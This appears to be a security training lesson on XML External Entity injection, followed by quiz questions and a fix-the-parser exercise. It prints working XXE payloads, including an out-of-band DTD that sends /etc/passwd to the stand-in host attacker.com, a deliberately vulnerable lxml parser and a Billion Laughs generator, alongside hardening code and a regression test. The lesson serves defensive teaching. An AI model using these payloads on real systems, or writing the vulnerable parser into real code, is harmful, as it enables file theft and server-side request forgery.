Advanced · 20 min

XXE (XML External Entity) Injection

Understand how attackers exploit XML parsers to read local files, perform SSRF, and crash servers — and how to disable external entities.

1 How XXE Works

XML External Entity (XXE) injection exploits XML parsers that process external entity references defined in a DOCTYPE declaration. When a parser fetches the entity, it can read local files, make internal network requests, or trigger denial-of-service.

Malicious XML payload reading /etc/passwd:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <name>&xxe;</name>
</root>

When the server parses this, the &xxe; entity is replaced with the contents of /etc/passwd, which then appears in the response or error message.

Vulnerable Python code using lxml:

from lxml import etree

def parse_xml(xml_data):
    root = etree.fromstring(xml_data)  # Dangerous: lxml releases before 5.0 resolve external entities by default
    return root.find('name').text

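XXE can also be used for SSRF, by replacing the file:// URL with an http:// URL that points at an internal service. A related attack, Billion Laughs, causes denial of service through nested internal entities whose expansion grows exponentially. It needs no external entity, only a parser that expands entities declared in the DOCTYPE.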
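To make the growth rate concrete, here is a minimal sketch that builds a small nested-entity document and computes its expanded size. The function names `build_nested_entities` and `expanded_size` and the entity names `e0`, `e1`, and so on are illustrative assumptions, not part of any library. The demo only parses a tiny 2-level document; the classic 9-level, fan-out-10 case is computed rather than parsed.

```python
import xml.etree.ElementTree as ET


def build_nested_entities(levels, fanout, seed="lol"):
    """Return an XML document whose entity e<levels> nests `levels` deep."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for i in range(1, levels + 1):
        # Each level references the previous level `fanout` times.
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = "\n  ".join(decls)
    return f"<!DOCTYPE r [\n  {dtd}\n]>\n<r>&e{levels};</r>"


def expanded_size(levels, fanout, seed="lol"):
    """Characters produced once every reference is expanded."""
    return len(seed) * fanout ** levels


# Harmless demo: 2 levels, fan-out 3 gives 3 * 3**2 = 27 characters.
small = ET.fromstring(build_nested_entities(2, 3))
assert len(small.text) == expanded_size(2, 3) == 27

# The classic payload (9 levels, fan-out 10) is under 1 KB of XML but
# would expand to 3 * 10**9 characters. It is computed here, not parsed.
print(expanded_size(9, 10))  # 3000000000
```

The point of the arithmetic is that the input size grows linearly with the number of levels while the output grows exponentially, so input-size limits alone do not stop this attack.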

2 Blind XXE via Out-of-Band Channels

Blind XXE occurs when the server does not return the entity contents in the response but the parser still fetches the resource. Attackers use out-of-band (OOB) channels to exfiltrate data.

OOB via parameter entities (DTD on attacker's server):

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo/>

The evil.dtd on the attacker's server contains:

<!ENTITY % payload "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%payload;
%exfil;

This causes the victim server to DNS-resolve and HTTP-connect to attacker.com, sending the file contents as a query parameter. Even if the application returns nothing, the attacker's server logs reveal the sensitive data.
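The substitution chain can be traced by hand. The sketch below simulates only the textual expansion of the parameter entity reference; it does no XML parsing and makes no network request. The helper `expand_parameter_refs` and the sample file contents are assumptions made for illustration.

```python
def expand_parameter_refs(text, param_entities):
    """Textually replace each %name; reference (simplified, no recursion)."""
    for name, value in param_entities.items():
        text = text.replace(f"%{name};", value)
    return text


# Assumed stand-in for what %file; would hold on the victim.
file_contents = "root:x:0:0:root:/root:/bin/bash"

# Entity value declared in evil.dtd. Inside an external DTD, %file; is
# expanded at the moment the declaration is read.
declared_value = "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>"
replacement_text = expand_parameter_refs(declared_value, {"file": file_contents})

# The system identifier is the URL the parser requests on dereference.
requested_url = replacement_text.split("'")[1]
print(requested_url)
```

The nested declaration is hosted in an external DTD because the XML specification forbids parameter entity references inside markup declarations in the internal subset.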

Error-based XXE: Some parsers include the entity value in error messages. Attackers deliberately craft invalid XML that forces the parser to include the file contents in the error response.
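One way to narrow the error-based channel, as a defense-in-depth measure rather than a fix for XXE itself, is to keep parser error text out of responses. The sketch below uses the standard library parser; the function name `parse_for_response`, the logger name, and the message text are hypothetical.

```python
import logging
import xml.etree.ElementTree as ET

logger = logging.getLogger("xml_upload")  # hypothetical logger name

GENERIC_ERROR = "Invalid XML document"


def parse_for_response(xml_data):
    """Return (root, None) on success or (None, generic_message) on failure."""
    try:
        return ET.fromstring(xml_data), None
    except ET.ParseError as exc:
        # Full parser detail goes to server-side logs only.
        logger.warning("XML parse failed: %s", exc)
        return None, GENERIC_ERROR
```

A caller would send only the second tuple element back to the client, so whatever the parser put into its exception message never reaches the attacker.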

3 Disabling External Entities

The fix is to configure the XML parser to disable external entity processing and, where the application allows it, to reject DOCTYPE declarations entirely. Most modern parsers support this, but it is not always the default.
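As a dependency-free illustration of rejecting DOCTYPE declarations outright, the following sketch pre-scans the input with the standard library's expat bindings and only then hands it to ElementTree. The names `DoctypeForbidden` and `parse_xml_no_doctype` are assumptions for this example, and the approach parses the input twice, so treat it as a sketch rather than a tuned implementation.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name!r}")


def parse_xml_no_doctype(xml_data):
    # First pass: expat calls the handler as soon as it sees <!DOCTYPE,
    # before any entity declared inside it could be used.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_data, True)
    # Second pass: build the tree from input known to have no DOCTYPE.
    return ET.fromstring(xml_data)
```

With this in place, a document such as `<root><name>alice</name></root>` parses normally, while any document carrying a DOCTYPE raises `DoctypeForbidden`.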

Python — defusedxml (safest option):

import defusedxml.ElementTree as ET

def parse_xml(xml_data):
    # By default defusedxml rejects entity declarations and external references;
    # forbid_dtd=True additionally rejects any DOCTYPE declaration.
    root = ET.fromstring(xml_data, forbid_dtd=True)
    return root.find('name').text

Python — lxml with features disabled:

from lxml import etree

def parse_xml(xml_data):
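    parser = etree.XMLParser(
        resolve_entities=False,  # leave entity references unexpanded
        no_network=True,         # block network access when resolving references
        load_dtd=False,          # do not load external DTDs
        dtd_validation=False     # never validate against a DTD
    )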
    root = etree.fromstring(xml_data, parser)
    return root.find('name').text

Java — Disabling external entities (DocumentBuilder):

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable external entities and DTDs
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder builder = dbf.newDocumentBuilder();

Java — XMLConstants for StAX parsers:

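XMLInputFactory xif = XMLInputFactory.newInstance();
// Disable DTD processing entirely
xif.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
// Block access to external DTDs and schemas
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);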

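If you do not need XML at all, consider accepting JSON instead. If XML is required, apply the hardening above to whichever parser you use (DOM, SAX, or StAX); a streaming parser keeps memory use down but is not immune to XXE on its own. In Python, prefer defusedxml, whose parsing functions reject entity declarations and external references by default.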
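Whichever parser is chosen, a small regression check can confirm that the configuration holds. The sketch below writes a marker string to a temporary file, references it through an external entity, and reports whether the parsing function under test returns it. `CANARY`, `leaks_local_file`, and `stdlib_parse_name` are hypothetical names; the standard library parser stands in for the application's real parsing function.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET

CANARY = "XXE-CANARY-7f3a"  # arbitrary marker string


def leaks_local_file(parse_name):
    """Return True if parse_name(xml_bytes) exposes a local file via XXE."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text(CANARY)
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>'
            "<root><name>&xxe;</name></root>"
        ).encode("utf-8")
        try:
            result = parse_name(payload)
        except Exception:
            return False  # refusing to parse the payload counts as safe
        return CANARY in (result or "")


def stdlib_parse_name(xml_data):
    # Parser under test; swap in the application's real parsing function.
    return ET.fromstring(xml_data).find("name").text


assert not leaks_local_file(stdlib_parse_name)
```

Running a check like this in the test suite catches a later change that re-enables entity resolution, for example a dependency downgrade or a new code path that builds its own parser.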

Knowledge Check

Q1

What XML construct does an XXE attack exploit?

Q2

A server parses uploaded XML but never returns the parsed content to the attacker. Can XXE still succeed?

Q3

Which Python library is the safest and easiest fix for XXE?

Q4

What does the Billion Laughs attack use XXE for?

Code Exercise

Fix the XML Parser to Disable External Entities

The function below parses user-supplied XML using lxml with default settings, making it vulnerable to XXE. Fix it by either switching to defusedxml or configuring the lxml parser to disable external entity resolution.
